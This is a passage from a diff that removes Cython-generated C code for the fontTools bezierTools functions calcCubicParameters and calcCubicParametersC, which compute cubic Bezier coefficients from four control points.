__pyx_pf_9fontTools_4misc_11bezierTools_52calcCubicParameters(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_52calcCubicParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4) { - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_v_x4 = NULL; - PyObject *__pyx_v_y4 = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicParameters", 1); - - /* "fontTools/misc/bezierTools.py":950 - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): - * x2, y2 = pt2 # <<<<<<<<<<<<<< - * x3, y3 = pt3 - * x4, y4 = pt4 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt2))) || (PyList_CheckExact(__pyx_v_pt2))) { - PyObject* sequence = __pyx_v_pt2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 950, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && 
!CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 950, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 950, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 950, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 950, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 950, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_x2 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_y2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":951 - * def calcCubicParameters(pt1, pt2, pt3, pt4): - * x2, y2 = pt2 - * x3, y3 = pt3 # <<<<<<<<<<<<<< - * x4, y4 = pt4 - * dx, dy = pt1 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt3))) || (PyList_CheckExact(__pyx_v_pt3))) { - PyObject* sequence = __pyx_v_pt3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 
2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 951, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 951, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 951, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 951, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 951, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 951, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_x3 = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_y3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":952 - * x2, y2 = pt2 - * x3, y3 = pt3 - * x4, y4 = pt4 # <<<<<<<<<<<<<< - * dx, dy = pt1 - * cx = (x2 - dx) * 3.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt4))) || 
(PyList_CheckExact(__pyx_v_pt4))) { - PyObject* sequence = __pyx_v_pt4; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 952, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 952, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 952, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 952, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 952, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 952, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_x4 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_y4 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":953 - * x3, y3 = pt3 - 
* x4, y4 = pt4 - * dx, dy = pt1 # <<<<<<<<<<<<<< - * cx = (x2 - dx) * 3.0 - * cy = (y2 - dy) * 3.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt1))) || (PyList_CheckExact(__pyx_v_pt1))) { - PyObject* sequence = __pyx_v_pt1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 953, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 953, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 953, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 953, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 953, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 953, __pyx_L1_error) - 
__pyx_L10_unpacking_done:; - } - __pyx_v_dx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_dy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":954 - * x4, y4 = pt4 - * dx, dy = pt1 - * cx = (x2 - dx) * 3.0 # <<<<<<<<<<<<<< - * cy = (y2 - dy) * 3.0 - * bx = (x3 - x2) * 3.0 - cx - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 954, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_3_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 954, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_cx = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":955 - * dx, dy = pt1 - * cx = (x2 - dx) * 3.0 - * cy = (y2 - dy) * 3.0 # <<<<<<<<<<<<<< - * bx = (x3 - x2) * 3.0 - cx - * by = (y3 - y2) * 3.0 - cy - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_y2, __pyx_v_dy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 955, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_3_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 955, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_cy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":956 - * cx = (x2 - dx) * 3.0 - * cy = (y2 - dy) * 3.0 - * bx = (x3 - x2) * 3.0 - cx # <<<<<<<<<<<<<< - * by = (y3 - y2) * 3.0 - cy - * ax = x4 - dx - cx - bx - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x3, __pyx_v_x2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 956, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_3_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 956, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 956, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_bx = __pyx_t_1; - 
__pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":957 - * cy = (y2 - dy) * 3.0 - * bx = (x3 - x2) * 3.0 - cx - * by = (y3 - y2) * 3.0 - cy # <<<<<<<<<<<<<< - * ax = x4 - dx - cx - bx - * ay = y4 - dy - cy - by - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y3, __pyx_v_y2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 957, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_3_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 957, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 957, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_by = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":958 - * bx = (x3 - x2) * 3.0 - cx - * by = (y3 - y2) * 3.0 - cy - * ax = x4 - dx - cx - bx # <<<<<<<<<<<<<< - * ay = y4 - dy - cy - by - * return (ax, ay), (bx, by), (cx, cy), (dx, dy) - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x4, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 958, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 958, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 958, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":959 - * by = (y3 - y2) * 3.0 - cy - * ax = x4 - dx - cx - bx - * ay = y4 - dy - cy - by # <<<<<<<<<<<<<< - * return (ax, ay), (bx, by), (cx, cy), (dx, dy) - * - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y4, __pyx_v_dy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 959, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) 
__PYX_ERR(0, 959, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 959, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":960 - * ax = x4 - dx - cx - bx - * ay = y4 - dy - cy - by - * return (ax, ay), (bx, by), (cx, cy), (dx, dy) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_ax); - __Pyx_GIVEREF(__pyx_v_ax); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_ax)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_ay); - __Pyx_GIVEREF(__pyx_v_ay); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_ay)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_bx); - __Pyx_GIVEREF(__pyx_v_bx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_bx)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_by); - __Pyx_GIVEREF(__pyx_v_by); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_by)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_cx); - __Pyx_GIVEREF(__pyx_v_cx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_cx)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_cy); - __Pyx_GIVEREF(__pyx_v_cy); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_cy)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_dx); - __Pyx_GIVEREF(__pyx_v_dx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, 
__pyx_v_dx)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_dy); - __Pyx_GIVEREF(__pyx_v_dy); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_v_dy)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 960, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_1)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_2)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_3)) __PYX_ERR(0, 960, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_5)) __PYX_ERR(0, 960, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_5 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XDECREF(__pyx_v_x4); - __Pyx_XDECREF(__pyx_v_y4); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":963 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * 
@cython.locals( - */ - -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicParametersC(__pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4) { - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_c; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicParametersC", 1); - - /* "fontTools/misc/bezierTools.py":975 - * ) - * def calcCubicParametersC(pt1, pt2, pt3, pt4): - * c = (pt2 - pt1) * 3.0 # <<<<<<<<<<<<<< - * b = (pt3 - pt2) * 3.0 - c - * a = pt4 - pt1 - c - b - */ - __pyx_v_c = __Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1), __pyx_t_double_complex_from_parts(3.0, 0)); - - /* "fontTools/misc/bezierTools.py":976 - * def calcCubicParametersC(pt1, pt2, pt3, pt4): - * c = (pt2 - pt1) * 3.0 - * b = (pt3 - pt2) * 3.0 - c # <<<<<<<<<<<<<< - * a = pt4 - pt1 - c - b - * return (a, b, c, pt1) - */ - __pyx_v_b = __Pyx_c_diff_double(__Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt2), __pyx_t_double_complex_from_parts(3.0, 0)), __pyx_v_c); - - /* "fontTools/misc/bezierTools.py":977 - * c = (pt2 - pt1) * 3.0 - * b = (pt3 - pt2) * 3.0 - c - * a = pt4 - pt1 - c - b # <<<<<<<<<<<<<< - * return (a, b, c, pt1) - * - */ - __pyx_v_a = __Pyx_c_diff_double(__Pyx_c_diff_double(__Pyx_c_diff_double(__pyx_v_pt4, __pyx_v_pt1), __pyx_v_c), __pyx_v_b); - - /* "fontTools/misc/bezierTools.py":978 - * b = (pt3 - pt2) * 3.0 - c - * a = pt4 - pt1 - c - b - * return (a, b, c, pt1) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_a); if (unlikely(!__pyx_t_1)) 
__PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pt1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 978, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1)) __PYX_ERR(0, 978, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_2)) __PYX_ERR(0, 978, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 978, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_4)) __PYX_ERR(0, 978, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":963 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicParametersC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = 0; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* 